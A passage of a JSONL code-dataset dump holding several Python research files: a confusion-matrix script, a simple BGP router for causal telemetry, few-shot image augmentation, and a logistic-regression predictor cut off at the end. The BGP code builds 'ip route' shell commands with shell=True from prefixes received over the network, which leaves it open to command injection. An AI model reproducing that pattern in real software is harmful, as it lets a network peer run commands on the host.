{"api_name": "tensorflow.convert_to_tensor", "line_number": 264, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 270, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq.tile_batch", "line_number": 274, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 274, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 279, "usage_type": "attribute"}, {"api_name": "tensorflow_addons.seq2seq.tile_batch", "line_number": 280, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 280, "usage_type": "attribute"}, {"api_name": 
"tensorflow_addons.seq2seq.BeamSearchDecoder", "line_number": 283, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 283, "usage_type": "attribute"}, {"api_name": "tensorflow.round", "line_number": 287, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 287, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 287, "usage_type": "call"}, {"api_name": "tensorflow.fill", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 299, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 300, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 308, "usage_type": "call"}, {"api_name": "tensorflow.math.reduce_max", "line_number": 310, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 310, "usage_type": "attribute"}, {"api_name": "tensorflow.function", "line_number": 262, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 319, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 322, "usage_type": "call"}, {"api_name": "os.path", "line_number": 322, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 327, "usage_type": "call"}, {"api_name": "os.path", "line_number": 327, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 332, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 341, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 341, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 344, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 344, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.GRU", "line_number": 350, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 350, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 359, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 371, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 371, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 374, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 374, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.LSTMCell", "line_number": 377, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 377, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.GRUCell", "line_number": 381, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 381, "usage_type": "attribute"}, {"api_name": "tensorflow_addons.seq2seq.sampler.TrainingSampler", "line_number": 389, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 389, "usage_type": "attribute"}, {"api_name": "tensorflow_addons.seq2seq.BasicDecoder", "line_number": 396, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 396, "usage_type": "attribute"}, {"api_name": "tensorflow_addons.seq2seq.LuongAttention", "line_number": 402, "usage_type": "call"}, {"api_name": 
"tensorflow_addons.seq2seq", "line_number": 402, "usage_type": "attribute"}, {"api_name": "tensorflow_addons.seq2seq.BahdanauAttention", "line_number": 406, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 406, "usage_type": "attribute"}, {"api_name": "tensorflow_addons.seq2seq.AttentionWrapper", "line_number": 412, "usage_type": "call"}, {"api_name": "tensorflow_addons.seq2seq", "line_number": 412, "usage_type": "attribute"}]} +{"seq_id": "31027004904", "text": "import tifffile as tiff\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix,ConfusionMatrixDisplay\nimport os\nimport cv2\nimport pandas as pd\n\ndef graycode(arr):\n gray_image=cv2.cvtColor(arr,cv2.COLOR_BGR2GRAY)\n return gray_image \n\n\n\n\n\nprint(\"Enter path to Ground Truth\")#Ground truth annotation images\npath1=input()\nground_truth_path=os.path.abspath(path1)\nprint(\"Enter path to Predicted Image\")#Predicition from the models\npath2=input()\npredicted_image_path=os.path.abspath(path2)\nground_truth_image=tiff.imread(ground_truth_path)\npredicted_image=tiff.imread(predicted_image_path)\n#ground_truth_image=graycode(ground_truth_image)\n#predicted_image=graycode(predicted_image)\ntruth=ground_truth_image.flatten()\nprediction=predicted_image.flatten()\nprint(truth)\nprint(prediction)\nconfusionmatrix=confusion_matrix(truth,prediction,labels=[255,110,54,145,24])#[24,54,110,145,255]) Enter the labels corresponding to classes from 11.py\ncmd=ConfusionMatrixDisplay(confusionmatrix)#,display_labels=['24','54','110','112','115','154','255']) To plot the actual confusion matrix\nprint(confusionmatrix)\ncmd.plot()\nnp.savetxt('SFPap2.csv',confusionmatrix,delimiter=',')\n'''\n\nimg1=pd.read_csv('Predict/GT.csv',delimiter=',')\nimg2=pd.read_csv('Predict/Pred.csv',delimiter=',')\nimg1=img1.to_numpy().flatten()\nimg2=img2.to_numpy().flatten()\ncon=confusion_matrix(img1,img2)\ncon\nindex=['Wetlands','Settlements','Water','Saltpan','Mangrove','Forest','Open Land']\ncol=['Wetlands','Settlements','Water','Saltpan','Mangrove','Forest','Open Land']\ndf=pd.DataFrame(con,index,col)\ndf\nnp.savetxt('Prediction.csv',img1,delimiter=',')\nimg1'''", "repo_name": "rahulkotru/Semantic_Segmentation_Of_PolSAR_Images", "sub_path": "Data Postprocessing/12.py", "file_name": "12.py", "file_ext": "py", "file_size_in_byte": 1630, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.cvtColor", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tifffile.imread", "line_number": 22, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "11692880073", "text": "import sys \nimport argparse\nimport time\nimport socket\nimport select\nimport subprocess\nimport traceback\n\n\nclass RIBEntry():\n def __init__(self, prefix, next_hop, as_path, local_pref, 
\n        self.prefix = prefix\n        self.next_hop = next_hop\n        self.as_path = as_path\n        self.local_pref = local_pref\n        self.selected = selected\n    # fields are read directly as attributes (e.g. entry.prefix); same-named\n    # accessor methods would be shadowed by those attributes, so none are defined\n\nclass TableKey:\n    def __init__(self, prefix, next_hop):  # prefix is a \"net/len\" string, next_hop a dotted-quad IP string\n        self.prefix = prefix\n        self.next_hop = next_hop\n    def ipaddr(self): return self.prefix.split(\"/\")[0]\n    def __hash__(self):\n        return hash(self.prefix) ^ hash(self.next_hop)\n    def __eq__(self, other):\n        if isinstance(other, self.__class__):\n            return self.prefix == other.prefix and self.next_hop == other.next_hop\n        else:\n            return False\n    def __str__(self):\n        return f\"{self.prefix} + {self.next_hop}\"\n    def __repr__(self):\n        return f\"{self.prefix} + {self.next_hop}\"\n\n\n# arguments are ip address for subnet (announcements), neighbor IP addresses, and AS number.\n# can probably actually derive AS number from ip address\n# Opening hello message will also share AS number info\n\nBGP_PORT = 1179\nASN = 0\nSOURCE = \"\"\nSERVER_IP = \"192.168.0.100\"\n\n\n# have a table that has the key as the TableKey and the value as a RIBEntry.\nRIBTable = {}\nlocal_prefs = {}\nlogical_clock = 0\n\ndef set_keepalive_linux(sock: socket.socket, after_idle_sec=1, interval_sec=3, max_fails=2):\n    \"\"\"Set TCP keepalive on an open socket.\n\n    It activates after after_idle_sec seconds of idleness,\n    then sends a keepalive ping once every interval_sec seconds,\n    and drops the connection after max_fails consecutive missed pings.\n    \"\"\"\n    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, after_idle_sec)\n    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, interval_sec)\n    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, max_fails)\n    #sock.settimeout(.5)\n\n\ndef initiate_connections(neighbors):\n    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    server_socket.bind(('', BGP_PORT))\n    server_socket.listen()\n    read_list = [server_socket]\n    print(f\"ASN {ASN} created server socket\")\n    time.sleep(.2)\n    client_sockets = []\n\n    for (ip, server, local_pref) in neighbors:\n        server = \"true\" in server\n        print(f\"ASN {ASN} ip: {ip} server: {server}\")\n        if not server:\n            print(f\"ASN {ASN} about to connect to {ip}\")\n            client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            client_socket.connect((ip, BGP_PORT))\n\n            client_sockets.append(client_socket)\n\n    while True:\n        readable, writable, errored = select.select(read_list, [], [], 1)\n        if len(readable) == 0:\n            break\n        for s in readable:\n            print(f\"ASN {ASN} about to accept\")\n            client_socket, address = s.accept()\n            client_sockets.append(client_socket)\n            print(f\"ASN {ASN} was connected to\")\n\n    print(f\"ASN {ASN} has {len(client_sockets)} sockets\")\n    for sock in client_sockets:\n        set_keepalive_linux(sock)\n    return client_sockets\n\ndef get_eventID():\n    global logical_clock\n    event_id = f\"{ASN},{logical_clock}\"\n    logical_clock += 1\n    return event_id\n\ndef replace_local_AS(message):\n    words = message.split(\" \")\n    if \"disconnect\" in message or \"del\" in message:\n        return message\n    elif words[0] == \"internal\":
== \"internal\":\n idx = message.find(\"via\") + 4\n left = message[:idx]\n right = message[idx:]\n words = right.split(\" \")\n nums = words[0].split(\".\")\n words[0] = str(int(nums[int(nums[3])]) - 1)\n \n return left + \" \".join(words)\n else:\n nums = words[-2].split(\".\")\n words[-2] = nums[int(nums[3])]\n return \" \".join(words)\n\ndef send_server(message):\n causal_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n addr = (SERVER_IP, 55555)\n # sockname = sock.getsockname()[0]\n # nums = sockname.split(\".\")\n # next_hop = nums[nums[3]]\n message = replace_local_AS(message)\n causal_socket.sendto(message.encode(), addr)\n \ndef log_send(message):\n # every send message should embed the event ID, semi-colon seperated\n # eventID;message --> node_id,timestamp;message\n # wrap this around every sendall function message \n # after should embed the eventID into the message and then return the string with eventID;message\n # while also sending it to the server with the eventID and message\n eventID = get_eventID()\n new_message = f\"{eventID};{message}\"\n server_message = f\"send {eventID} {message}\"\n send_server(server_message)\n return new_message\n\ndef log_recv(updates):\n global logical_clock\n # eventID;message --> node_id,timestamp;message\n stripped_updates = []\n for update in updates:\n send_eventID, stripped_update = update.split(\";\")\n stripped_updates.append(stripped_update)\n message = f\"receive {send_eventID} {get_eventID()} {stripped_update}\"\n send_server(message)\n #logical_clock += 1\n # every receive should parse the embed event ID \n # TODO: grab the info I need and then strip it before returning it\n return stripped_updates\n\ndef log_internal(message):\n eventID = get_eventID()\n message = f\"internal {eventID} {message}\"\n send_server(message)\n\ndef read_updates(sock):\n # read until I end with a newline. Could have multiple requests\n while True:\n buffer = ''\n data = sock.recv(1024)\n if not data:\n pass\n #print(\"Disconnected\") #will this happen if link down? probably not. 
\n        buffer += data.decode()\n        if buffer.endswith(\"\\n\"):\n            updates = buffer.split(\"\\n\")[:-1]\n            return log_recv(updates)\n\ndef select_route(sockets, prefix, neighbor_from):\n    global RIBTable\n\n    if ASN == \"1\":\n        print(f\"{ASN} selecting route from {RIBTable}\")\n\n    keys = list(RIBTable.keys())\n    keys = [key for key in keys if key.prefix == prefix]\n\n    if not keys:  # no routes\n        # send withdrawal to neighbors\n        for sock in sockets:\n            if sock.getpeername()[0] != neighbor_from:\n                message = f\"withdraw {prefix} {sock.getsockname()[0]} empty\\n\"\n                message = log_send(message)\n                sock.sendall(message.encode())\n        return\n\n    selected_route = [key for key in keys if RIBTable[key].selected]  # invariant that at most one is selected at any time\n    selected_route = selected_route[0] if selected_route else None\n\n    best_key = keys[0]\n    if ASN == \"3\":\n        print(keys)\n    for key in keys:\n        route = RIBTable[key]\n        best_route = RIBTable[best_key]\n\n        if ASN == \"3\":\n            print(f\"key: {key} local pref {route.local_pref} as_path: {route.as_path}\")\n        # first check local_pref\n        if route.local_pref != best_route.local_pref:\n            if route.local_pref > best_route.local_pref:\n                best_key = key\n        elif len(route.as_path) < len(best_route.as_path):  # then check as_path length\n            best_key = key\n\n    # if the best_route is the same as the previous selected route, don't need to update\n    if RIBTable[best_key].selected:\n        return\n\n    if ASN == \"3\":\n        print(f\"best route: {best_key}\")\n\n    command = f\"ip route del {best_key.prefix}\"\n    subprocess.run(command, shell=True)\n    if selected_route:\n        RIBTable[selected_route].selected = False\n    RIBTable[best_key].selected = True\n    print(f\"ASN {ASN} add route to {best_key.prefix} via {best_key.next_hop}\\n\")\n    command = f\"ip route add {best_key.prefix} via {best_key.next_hop} src {SOURCE}\"\n    subprocess.run(command, shell=True)\n    log_internal(command)\n\n    # send announcements for neighbors.\n    for sock in sockets:\n        if sock.getpeername()[0] != neighbor_from:\n            as_path = \",\".join(RIBTable[best_key].as_path) + f\",{ASN}\"\n            message = f\"update {prefix} {sock.getsockname()[0]} {as_path}\\n\"\n            message = log_send(message)\n            sock.sendall(message.encode())\n    # TODO: remove current route to IP address in linux routing table (might have to do this before I overwrite the route)\n    # if selected_route exists then set selected to 0\n    # set best_key selected to 1\n    # add best_key route to linux routing table\n    # advertise best_key route to all neighbors, except for neighbor_from. Make sure to set neighbor correctly to be my own IP address, and add ASN to as_path\n\n\n\n\n    # get all of the keys for that prefix\n\n    # get the current selected route\n\n    # calculate the best route. If it is not the current route (which if it's none will always be the case) then remove current route from linux routing table (assuming it's not none) and add new one\n    # then advertise the new route to neighbors.\n    # set old best route selected to 0 and new best route selected to 1.\n\n\n    # if best route is empty (meaning no routes) then advertise withdrawal to neighbor sockets, except for neighbor_from.
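\n    # (that case is handled up front by the if-not-keys branch at the top of this function)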
\n\n    # in the case of update or withdraw it's possible one is already selected, so make sure to set that to 0 after selecting the right one\n    # in the case of withdraw it's possible there are no longer any routes, in which case it should return -1 (returns 0 if successful)\n    # in the case of no route, send a withdraw to all neighbors that are not the one that sent it originally (withdrawNeighbor)\n    # if a route is updated, then send an update to everyone except for neighbor\n\n    # after selecting route, if I have to make selected 0 for an entry, then remove it from linux routing\n    # if I make select 1 for an entry, add it to linux routing\n\n\ndef route_filter(update):\n\n    # local prefs\n\n    # should probably make this a JSON input at some point\n    vals = update.split(\" \")\n    action = vals[0]  # either update or withdraw\n    prefix = vals[1]\n    neighbor = vals[2]\n    local_pref = local_prefs[neighbor]\n    as_path = vals[3].split(\",\")\n    if ASN in as_path:\n        return None, None\n    entry = RIBEntry(prefix, neighbor, as_path, local_pref, False)\n    return entry, action\n\ndef process_updates(sockets, updates):\n    global RIBTable\n    # update looks like:\n    # prefix neighbor as1,as2,as3\n    for update in updates:\n        rib_entry, action = route_filter(update)\n        if not rib_entry:  # our ASN was already in the as_path (loop prevention)\n            continue\n\n        # (prefix, next hop) should be unique, so there is only one entry per pair; withdraw and update must modify THAT entry rather than add a new one\n\n        # I can just plug it into the table and set selected to 0. select_route will decide if it needs to send an update/withdraw and select the correct route.\n        if action == \"update\":\n            key = TableKey(rib_entry.prefix, rib_entry.next_hop)\n            RIBTable[key] = rib_entry\n        elif action == \"withdraw\":\n            command = f\"ip route del {rib_entry.prefix}\"\n            subprocess.run(command, shell=True)\n            log_internal(command)\n            key = TableKey(rib_entry.prefix, rib_entry.next_hop)\n            print(f\"asn {ASN} withdraw route key: {key}\")\n            if key in RIBTable:\n                del RIBTable[key]\n            else:\n                print(f\"{ASN} tried to withdraw {key}, but not in table\")\n        else:\n            raise ValueError(f\"action not known: {action}\")\n\n        select_route(sockets, rib_entry.prefix, rib_entry.next_hop)\n\n    # for sending update can use socket.getsockname()\n\n    # pass each update message through the filter to get local_pref\n    # turn it into RIB entry data structure\n    # if the prefix is new just add it to the RIB and linux routing table\n    # if it's already in there, compare it to the current selected route and if it's better, replace it as selected and in the linux routing table\n    # if it's a withdraw, then remove the route and select a new one.\n    # any time a new selected route is chosen, I should send an update message to neighbors, unless next_hop is that neighbor\n\n    # need a way to test if the connection link went down, then should send a withdraw message to all neighbors (except for the down link one)\n\n\n    # if a router changes its route it's just an update message. This has to clear the old entry (from the same AS), because it can't have two different paths to the same prefix from the same AS.\n    # if a route goes down and there's no alternative, then it sends a withdrawal, until an AS has an alternative and it is propagated.
\n \n\ndef main():\n # TODO: local pref has to be passed in as an argument\n global ASN\n global local_prefs\n global SOURCE\n global RIBTable\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--ip', type=str, required=True)\n parser.add_argument('--neighbor', nargs=3, action='append', type=str, required=True)\n\n\n args = parser.parse_args()\n\n ip = args.ip\n neighbors = args.neighbor\n print(f\"ip: {args.ip} \\nneighbors: {args.neighbor}\")\n\n\n for (ip_, server, local_pref) in neighbors: # set local_prefs\n local_prefs[ip_] = int(local_pref)\n\n\n ASN = ip.split(\".\")[2]\n SOURCE = ip[:-4] + \"1\"\n sockets = initiate_connections(neighbors)\n\n saved_addr = {}\n for sock in sockets:\n saved_addr[sock] = sock.getpeername()\n\n # prefix neighbor as1,as2,as3 \n\n # send announcements for neighbors. \n for sock in sockets:\n print(f\"socket name: {sock.getsockname()}\")\n addr = sock.getsockname()[0]\n message = f\"update {ip} {addr} {ASN}\\n\"\n message = log_send(message)\n sock.sendall(message.encode())\n time.sleep(.5)\n future = time.time() + 3\n sent = False\n # main loop for running BGP\n while True:\n read_sockets, write_sockets, error_sockets = select.select(sockets, [], [], .5)\n\n # print(\"SLKDJFKL:SDJKLFJS\")\n # # test for links down\n # for i, sock in enumerate(sockets):\n # try: \n # print(f\"{ASN} sock.getpeername()\")\n # except OSError as e:\n # print(f\"{saved_addr[sock]} disconnected\")\n\n # test for links down\n for i, sock in enumerate(read_sockets):\n try:\n data = sock.recv(1, socket.MSG_PEEK)\n except TimeoutError as e:\n print(f\"Socket {saved_addr[sock]} disconnected\")\n print(f\"socket {sock.getsockname()} \")\n # TODO: have to withdraw all the IP routes where next hop is this neighbor (get neighbor from saved_addr). In withdraw message the next_hop should be sock.getsockname()[0]\n #print(f\"{ASN} sending withdraw to {sock.getpeername()[0]} from {sock.getsockname()[0]} \")\n #message = f\"withdraw 10.0.2.0/24 {sock.getsockname()[0]} {ASN}\\n\"\n #sock.sendall(message.encode())\n print(list(RIBTable.keys())[0].next_hop)\n print(list(RIBTable.keys())[0].next_hop == saved_addr[sock][0])\n items = [(key, val) for (key, val) in RIBTable.items() if key.next_hop == saved_addr[sock][0]]\n sockets.remove(sock) # remove the socket\n print(items)\n\n for key, val in items:\n if val.selected: # if it's selected then need to remove from kernel routing table and RIBTable and call select route\n command = f\"ip route del {key.prefix}\"\n subprocess.run(command, shell=True)\n log_internal(\"disconnect: \" + command)\n del RIBTable[key]\n select_route(sockets, key.prefix, key.next_hop)\n else: # otherwise just need to remove it \n del RIBTable[key]\n\n # get all of the IP prefixes that neighbor was advertising from RIB. If any of the routes are selected, run select route on it after removing from table\n # remove the socket from the list. 
delete the route from the routing table and RIBTable\n # call select route\n\n # TODO: MRAI timer \n # have a queue of messages that are waiting on their timer and check them in this main loop \n # keep track of destinations in a queue and advertise current selected route after timer is done (or withdraw if there is none)\n \n\n\n for sock in read_sockets:\n updates = read_updates(sock)\n process_updates(sockets, updates)\n\n # test for links down\n # for sock in sockets:\n # try:\n # data = sock.recv(1)\n # print(f\"DATA: {data}\")\n # if data == b'':\n # print(f\"{ASN} CONNECTION FAILED\")\n # except TimeoutError:\n # print(\"continuing\")\n # continue\n \n\n \n\n # if ASN == \"3\" and time.time() > future and not sent:\n # print(f\"len sockets: {len(sockets)}\")\n # sock = sockets[1]\n # print(\"withdrawing route\")\n # sent = True\n # print(f\"{ASN} sending withdraw to {sock.getpeername()[0]} from {sock.getsockname()[0]} \")\n # message = f\"withdraw 10.0.2.0/24 {sock.getsockname()[0]} {ASN}\\n\"\n # sock.sendall(message.encode())\n\n #TODO: Send packets to central server for send, recieve, and internal events. Page 3 of causal telemetry paper\n # need to keep track of logical time-stamp ID and node ID (ASN). Re-read causal telemetry EuroP4 paper\n # TODO: Add to setup a hello message where the server can get the ASN and IP (10.x.x.x) of each router and put it into the space-time data structure\n # TODO: Change all sending to include the event ID (ASN and logical_clock). And also increase the logical_clock after each one, and also send it to the log (maybe have a log function)\n # TODO: Change all receive to parse the eventID and then add to the log. and increment logical clock\n # TODO: decide which internal events I want to log and make sure to increment logical clock\n\n # use select framework to read all the data. Use data format with \\n for messages to make parsing easy \n\n\n# once I get sockets, use select and polling framework. \n\n\n# handle the select polling of the socket connections \n # need to figure out what it looks like when a link goes down from socket POV\n # I think it's using the timeout\n # do I need MRAI timer? \n# upon update message receive need to change the RIB table and update kernel routing tables\n# then send out new update messages \n\n# FIB table:\n# IP announced, next hop, AS path, local pref, selected (bool)\n\n# MRAI timer:\n# dictionary with entry for each ip address prefix (make sure to remove when withdraw)\n# if I send an update, withdraw then don't update again until it's been 30 seconds. might need some fancy. or just a queue of waiting messages to send. 
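\n# (MRAI = Minimum Route Advertisement Interval: the per-destination minimum spacing BGP enforces between successive advertisements, classically about 30 seconds for eBGP)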
\n\nif __name__ == \"__main__\":\n main()", "repo_name": "bennyrubin/CausalTelemetry", "sub_path": "src/simpleBGP.py", "file_name": "simpleBGP.py", "file_ext": "py", "file_size_in_byte": 19610, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "socket.socket", "line_number": 59, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 66, "usage_type": "attribute"}, {"api_name": "socket.SO_KEEPALIVE", "line_number": 66, "usage_type": "attribute"}, {"api_name": "socket.IPPROTO_TCP", "line_number": 67, "usage_type": "attribute"}, {"api_name": "socket.TCP_KEEPIDLE", "line_number": 67, "usage_type": "attribute"}, {"api_name": "socket.IPPROTO_TCP", "line_number": 68, "usage_type": "attribute"}, {"api_name": "socket.TCP_KEEPINTVL", "line_number": 68, "usage_type": "attribute"}, {"api_name": "socket.IPPROTO_TCP", "line_number": 69, "usage_type": "attribute"}, {"api_name": "socket.TCP_KEEPCNT", "line_number": 69, "usage_type": "attribute"}, {"api_name": "socket.socket", "line_number": 74, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 74, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 74, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 75, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 75, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 80, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 88, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 88, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 88, "usage_type": "attribute"}, {"api_name": "select.select", "line_number": 94, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 133, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 133, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 133, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 230, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 236, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 310, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 346, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 380, "usage_type": "call"}, {"api_name": "time.time", "line_number": 381, "usage_type": "call"}, {"api_name": "select.select", "line_number": 385, "usage_type": "call"}, {"api_name": "socket.MSG_PEEK", "line_number": 398, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 415, "usage_type": "call"}]} +{"seq_id": "11368089477", "text": "import torch\nimport torchvision.transforms as transforms\nimport random\n\ndef gamma_correction(x, gamma):\n minv = torch.min(x)\n x = x - minv\n\n maxv = torch.max(x)\n x = x / maxv\n\n x = x**gamma\n x = x * maxv + minv\n return x\n\ndef random_aug(x):\n # gamma correction\n if random.random() <= 0.3:\n gamma = random.uniform(1.0, 1.5)\n x = gamma_correction(x, gamma)\n # random erasing with mean value\n mean_v = tuple(x.view(x.size(0), -1).mean(-1))\n re = transforms.RandomErasing(p=0.5, value=mean_v)\n x = re(x)\n # color channel shuffle\n if random.random() <= 0.3:\n l = [0,1,2]\n random.shuffle(l)\n x_c = torch.zeros_like(x)\n x_c[l] = x\n x = x_c\n # horizontal flip or vertical flip\n if random.random() <= 0.5:\n if random.random() <= 0.5:\n x = torch.flip(x, [1])\n else:\n x 
= torch.flip(x, [2])\n    # rotate 90, 180 or 270 degree\n    if random.random() <= 0.5:\n        degree = [90, 180, 270]\n        d = random.choice(degree)\n        x = torch.rot90(x, d//90, [1, 2])\n    return x\n\nclass PseudoSampleGenerator(object):\n    def __init__(self, n_way, n_support, n_pseudo):\n        super(PseudoSampleGenerator, self).__init__()\n        self.n_way = n_way\n        self.n_support = n_support\n        self.n_pseudo = n_pseudo\n        self.n_pseudo_per_way = self.n_pseudo//self.n_way\n\n    def generate(self, support_set):  # (5*n_support, 3, 224, 224)\n        times = self.n_pseudo//(self.n_way*self.n_support)+1\n        pseudo_list = []\n        for i in range(support_set.size(0)):\n            pseudo_list.append(support_set[i])\n            for j in range(1, times):\n                cur_x = support_set[i]\n                cur_x = random_aug(cur_x)\n                pseudo_list.append(cur_x)\n\n        pseudo_set = torch.stack(pseudo_list)\n        pseudo_set = pseudo_set.reshape([self.n_way, self.n_pseudo_per_way+self.n_support]+list(pseudo_set.size()[1:]))\n        return pseudo_set", "repo_name": "Haoqing-Wang/CDFSL-ATA", "sub_path": "PSG.py", "file_name": "PSG.py", "file_ext": "py", "file_size_in_byte": 1990, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 52, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.min", "line_number": 6, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 9, "usage_type": "call"}, {"api_name": "random.random", "line_number": 18, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 19, "usage_type": "call"}, {"api_name": "torchvision.transforms.RandomErasing", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 23, "usage_type": "name"}, {"api_name": "random.random", "line_number": 26, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 29, "usage_type": "call"}, {"api_name": "random.random", "line_number": 33, "usage_type": "call"}, {"api_name": "random.random", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.flip", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.flip", "line_number": 37, "usage_type": "call"}, {"api_name": "random.random", "line_number": 39, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.rot90", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 63, "usage_type": "call"}]}
+{"seq_id": "39311911825", "text": "from sklearn.metrics import accuracy_score\nfrom logistic_regression import MyLR\nfrom Ft_array import *\nimport numpy as np\nimport pandas as pd\nimport argparse\n\nDEFAULT_FILE = \"./dataset_test.csv\"\nDEFAULT_SAVED_FILE = \".thetas\"  # defined up front, next to its sibling constant\nCLASSES = \"Hogwarts House\"\n\ndef predict(path):\n    thetas = np.loadtxt(DEFAULT_SAVED_FILE)\n\n    lr_classes = [MyLR(np.array(theta)) for theta in thetas]\n\n    data = pd.read_csv(path)\n\n    y = data[CLASSES]\n    print(data)\n    x = data.select_dtypes(exclude=['object']).dropna()\n\n    predictions = [lr.predict_(normalize_features(x)) for lr in lr_classes]  # renamed so it no longer shadows this function\n    predictions = np.array(predictions)\n    data[CLASSES] = predictions.T\n    # print(predictions.T)\n    # unique, counts = np.unique(house_predict == y, return_counts=True)\n    # print(dict(zip(unique, counts)))\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"path\", type=str, default=DEFAULT_FILE, help=\"dataset_train.csv\")\n    args = parser.parse_args()\n\n    predict(args.path)\n\nif __name__ == '__main__':\n    main()\n", "repo_name": "ygarrot/dslr_v2", "sub_path": "logreg_predict.py", 
